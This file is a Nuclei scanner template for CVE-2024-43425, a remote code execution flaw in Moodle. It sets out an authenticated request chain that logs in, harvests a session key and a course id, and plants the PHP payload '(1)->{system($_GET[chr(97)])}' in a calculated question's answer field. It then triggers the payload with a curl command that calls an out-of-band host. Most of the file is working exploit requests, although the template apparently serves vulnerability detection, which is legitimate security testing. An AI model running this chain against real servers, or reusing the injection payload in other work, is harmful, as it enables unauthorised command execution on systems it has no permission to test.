nuclei-templates/http/cves/2024/CVE-2024-43425.yaml

127 lines
5.2 KiB
YAML

id: CVE-2024-43425
info:
name: Moodle - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
reference:
- https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions
- https://blog.redteam-pentesting.de/2024/moodle-rce/
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425
classification:
cvss-score: 9.8
cve-id: CVE-2024-43425
metadata:
verified: true
max-request: 1
shodan-query: title:"Moodle"
tags: cve,cve2024,moodile,rce,authenticated
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)
http:
- raw:
- |
GET /login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
anchor=&logintoken={{token}}&username={{username}}&password={{password}}
host-redirects: true
extractors:
- type: regex
part: body
name: token
group: 1
regex:
- 'name="logintoken" value="([a-zA-Z0-9]+)">'
internal: true
- raw:
- |
GET /my/courses.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: sesskey
part: body
internal: true
group: 1
regex:
- '"sesskey":"([^"]+)"'
- raw:
- |
POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[{"index":0,"methodname":"core_course_get_enrolled_courses_by_timeline_classification","args":{"offset":0,"limit":0,"classification":"all","sort":"fullname","customfieldname":"","customfieldvalue":"","requiredfields":["id","fullname","shortname","showcoursecategory","showshortname","visible","enddate"]}}]
extractors:
- type: json
part: body
name: courseid
json:
- ".[].data.courses[0].id"
internal: true
- raw:
- |
POST /question/bank/editquestion/question.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
initialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes
extractors:
- type: regex
part: header
name: id
group: 1
internal: true
regex:
- "&id=([0-9]+)&"
- raw:
- |
POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page
extractors:
- type: regex
part: header
name: rceurl
group: 1
internal: true
regex:
- "Location: https?://.*?/question/(.*)&returnurl"
- raw:
- |
GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
# digest: 490a0046304402206751ee480090a5e57009256b124a5b385fb35e0ad2c554e3e4e9081f07d433a602205a3c2bb69019ccd312411579022b8f9f0ffff59aebc705f23ef418df865ad97a:922c64590222798bb761d5b6d8e72950